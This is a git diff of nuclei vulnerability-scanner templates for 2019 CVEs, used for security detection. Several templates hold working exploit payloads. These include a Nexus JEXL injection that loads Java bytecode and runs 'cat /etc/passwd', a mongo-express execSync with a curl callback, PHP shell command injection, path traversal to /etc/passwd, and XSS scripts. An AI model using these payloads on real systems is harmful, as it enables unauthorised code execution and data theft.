a/nuclei-templates/CVE-2019/CVE-2019-7238.yaml b/nuclei-templates/CVE-2019/CVE-2019-7238.yaml deleted file mode 100644 index 43dd90ddad..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-7238.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-7238 -info: - name: Nexus Repository Manager RCE - author: medbsq - severity: high -# https://www.cvebase.com/cve/2018/18264 -requests: - - method: POST - path: - - "{{BaseURL}}/service/extdirect" - headers: - body: "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" - matchers-condition: and - matchers: - - type: word - words: - - "root:" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-7255.yaml b/nuclei-templates/CVE-2019/CVE-2019-7255.yaml index f754c57f8b..9a0ccd103b 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-7255.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-7255.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://www.applied-risk.com/resources/ar-2019-005 - https://applied-risk.com/labs/advisories - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-7255 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-7255 cwe-id: CWE-79 + epss-score: 0.01232 + epss-percentile: 0.85132 + cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: linear_emerge_essential_firmware shodan-query: http.title:"eMerge" - verified: "true" - tags: emerge,xss,packetstorm,cve,cve2019,nortek + tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol -requests: +http: - method: GET path: - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -41,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/09/08 +# digest: 4b0a00483046022100d2ca585bfa1e478670a139dba643afbc320c5036cd04ad9a0b7bb8ed9eee267f02210089d1ea3ca08cf877349adc37c199ddd68e4b7191d459e3411637dc7dfab55fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml b/nuclei-templates/CVE-2019/CVE-2019-7315.yaml index 0bdd73e572..7e2cb32f90 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-7315.yaml @@ -1,13 +1,13 @@ id: CVE-2019-7315 info: - name: Genie Access WIP3BVAF IP Camera - Local File Inclusion + name: Genie Access WIP3BVAF IP Camera - Directory Traversal author: 0x_Akoko severity: high - description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow. reference: - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ - https://vuldb.com/?id.136593 - - https://nvd.nist.gov/vuln/detail/CVE-2019-7315 + - https://www.cvedetails.com/cve/CVE-2019-7315 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -27,5 +27,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-7543.yaml b/nuclei-templates/CVE-2019/CVE-2019-7543.yaml index d10b28faec..fd87d15c32 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-7543.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-7543.yaml @@ -1,4 +1,5 @@ id: CVE-2019-7543 + info: name: KindEditor 4.1.11, the php/demo.php - (XSS) author: pikpikcu @@ -7,12 +8,13 @@ info: reference: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 + tags: cve,cve2019,kindeditor,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2019-7543 cwe-id: CWE-79 - tags: cve,cve2019,kindeditor,xss + requests: - method: POST path: @@ -21,12 +23,15 @@ requests: body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" headers: Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word words: - '' part: body + - type: word part: header words: diff --git a/nuclei-templates/CVE-2019/CVE-2019-8086.yaml b/nuclei-templates/CVE-2019/CVE-2019-8086.yaml index ca798672cc..6555a9c9be 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-8086.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-8086.yaml @@ -1,27 +1,38 @@ id: CVE-2019-8086 info: - name: Adobe Experience Manager XXE + name: Adobe Experience Manager - XML External Entity Injection author: DhiyaneshDk severity: high - description: Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure. + description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution. + remediation: | + Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py - - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086 + - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 + - https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-8086 cwe-id: CWE-611 + epss-score: 0.13896 + epss-percentile: 0.95514 + cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: adobe + product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: cve,cve2019,aem,adobe -requests: +http: - raw: - | POST /content/{{randstr}} HTTP/1.1 @@ -31,7 +42,6 @@ requests: Referer: {{BaseURL}} sling:resourceType=fd/af/components/guideContainer - - | POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1 Host: {{Hostname}} @@ -56,3 +66,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502204f4724147e6b4fccd24a3a74c7d5d9ceb47aeacef3d0b7a842540575f9b1963e022100b096a744afe1978dd47f2cfbca79878b90892ee0ff6dacb1fefd99c6b253ddfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-8390.yaml b/nuclei-templates/CVE-2019/CVE-2019-8390.yaml index a869bfbd23..d063a60bba 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-8390.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-8390.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: @@ -19,7 +21,7 @@ info: cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.0161 - epss-percentile: 0.86029 + epss-percentile: 0.86055 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -73,4 +75,4 @@ http: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body -# digest: 4a0a00473045022037a82fab22bc6f38ae948024efe9cb73f1118b72fa2a2582aa9d8a89220d5ab7022100eb140f8f9274b721d249bd801db0b78b6d2965574dfe71d1bda2700bcd8c5023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3a81b15258e85c407afba37c5e98425aecd7660c75135635414559f31097d82022046fc8312c4110e31e2cef362127368744f05d69b7564cffb7f03ef8b604a49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-8446.yaml b/nuclei-templates/CVE-2019/CVE-2019-8446.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8446.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8446.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml b/nuclei-templates/CVE-2019/CVE-2019-8449.yaml deleted file mode 100644 index df0921cbf3..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-8449 -info: - name: JIRA Unauthenticated Sensitive Information Disclosure - author: harshbothra_ - severity: medium - description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. - reference: - - https://www.doyler.net/security-not-included/more-jira-enumeration - - https://jira.atlassian.com/browse/JRASERVER-69796 - - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-8449 - cwe-id: CWE-306 - tags: cve,cve2019,atlassian,jira,disclosure -requests: - - method: GET - path: - - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '{"users":{"users":' - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-8451.yaml b/nuclei-templates/CVE-2019/CVE-2019-8451.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8451.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8451.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-8903.yaml b/nuclei-templates/CVE-2019/CVE-2019-8903.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8903.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8903.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-9915.yaml b/nuclei-templates/CVE-2019/CVE-2019-9915.yaml new file mode 100644 index 0000000000..0127935998 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9915.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-9915 +info: + name: GetSimpleCMS 3.3.13 - Open Redirection + author: 0x_Akoko + severity: medium + description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms + - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 + - https://www.cvedetails.com/cve/CVE-2019-9915 + - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9915 + cwe-id: CWE-601 + metadata: + verified: "true" + tags: cve,cve2019,redirect,getsimple,cms +requests: + - raw: + - | + POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userid={{username}}&pwd={{password}}&submitted=Login + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9922.yaml b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml new file mode 100644 index 0000000000..c8af51903f --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-9922 +info: + name: JE Messenger 1.2.2 Joomla - Directory Traversal + author: 0x_Akoko + severity: high + description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files. + reference: + - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md + - https://www.cvedetails.com/cve/CVE-2019-9922 + - https://extensions.joomla.org/extension/je-messenger/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-9922 + cwe-id: CWE-22 + tags: cve,cve2019,joomla,messenger,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10068.yaml b/nuclei-templates/CVE-2019/cve-2019-10068.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10068.yaml rename to nuclei-templates/CVE-2019/cve-2019-10068.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1010287.yaml b/nuclei-templates/CVE-2019/cve-2019-1010287.yaml new file mode 100644 index 0000000000..02fb5c9607 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-1010287.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-1010287 + +info: + name: Timesheet 1.5.3 - Cross Site Scripting + author: pikpikcu + severity: medium + description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + - http://www.mdh-tz.info/ # demo + tags: cve,cve2019,timesheet,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"/timesheet/login.php" + +requests: + - raw: + - | + POST /timesheet/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '>' + part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-10717.yaml b/nuclei-templates/CVE-2019/cve-2019-10717.yaml new file mode 100644 index 0000000000..a69c522e03 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-10717.yaml @@ -0,0 +1,54 @@ +id: CVE-2019-10717 + +info: + name: BlogEngine.NET 3.3.7.0 - Local File Inclusion + author: arafatansari + severity: high + description: | + BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. + remediation: | + Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability. + reference: + - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect + - https://github.com/rxtur/BlogEngine.NET/commits/master + - https://nvd.nist.gov/vuln/detail/CVE-2019-10717 + - http://seclists.org/fulldisclosure/2019/Jun/44 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N + cvss-score: 7.1 + cve-id: CVE-2019-10717 + cwe-id: CWE-22 + epss-score: 0.00409 + epss-percentile: 0.712 + cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dotnetblogengine + product: blogengine.net + shodan-query: http.html:"Blogengine.net" + tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine + +http: + - method: GET + path: + - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + + - type: regex + regex: + - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100e9835e960c185d264844ff6a1c0dcc4461f0848d00e894bb0681a656b4939db90220223530414a1d116e03bae637ebc7a0b6037ac08c0f2daee019cd5fc664d2e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-10758.yaml b/nuclei-templates/CVE-2019/cve-2019-10758.yaml deleted file mode 100644 index 9ce3a78eca..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-10758.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-10758 - -info: - name: mongo-express Remote Code Execution - author: princechaddha - severity: critical - description: "mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment." - reference: - - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - remediation: Upgrade mongo-express to version 0.54.0 or higher. - metadata: - shodan-query: http.title:"Mongo Express" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.90 - cve-id: CVE-2019-10758 - tags: cve,cve2019,mongo,mongo-express - -requests: - - raw: - - | - POST /checkValid HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46cGFzcw== - Content-Type: application/x-www-form-urlencoded - - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/03/29 diff --git a/nuclei-templates/CVE-2019/cve-2019-11013.yaml b/nuclei-templates/CVE-2019/cve-2019-11013.yaml new file mode 100644 index 0000000000..d5cbcb989d --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-11013.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-11013 + +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: medium + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 + tags: cve,cve2019,lfi,nimble + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + description: "Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server." + +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-11043.yaml b/nuclei-templates/CVE-2019/cve-2019-11043.yaml deleted file mode 100644 index 994593963e..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-11043.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-11043 - -info: - name: PHP RCE - author: medbsq - severity: critical - # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - - -requests: - - method: GET - path: - - "{{BaseURL}}//?a=/bin/sh+-c+'which+which'&" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - - matchers: - - type: word - words: - - "/bin/which" - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-11370.yaml b/nuclei-templates/CVE-2019/cve-2019-11370.yaml index c2f5e3f80f..0d2b1b1d75 100644 --- a/nuclei-templates/CVE-2019/cve-2019-11370.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-11370.yaml @@ -6,21 +6,32 @@ info: severity: medium description: | Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. + remediation: | + Apply the latest patch or upgrade to a version that addresses the vulnerability. reference: - https://www.exploit-db.com/exploits/46897 - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2019-11370 cwe-id: CWE-79 + epss-score: 0.1896 + epss-percentile: 0.96129 + cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: carel + product: pcoweb_card_firmware shodan-query: http.html:"pCOWeb" - verified: "true" - tags: pcoweb,xss,carel,edb,cve,cve2019 + tags: cve,cve2019,pcoweb,xss,carel,edb -requests: +http: - raw: - | POST /config/pw_snmp_done.html HTTP/1.1 @@ -28,12 +39,10 @@ requests: Content-Type: application/x-www-form-urlencoded %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - | GET /config/pw_snmp.html HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers: - type: dsl dsl: @@ -41,5 +50,4 @@ requests: - status_code_2 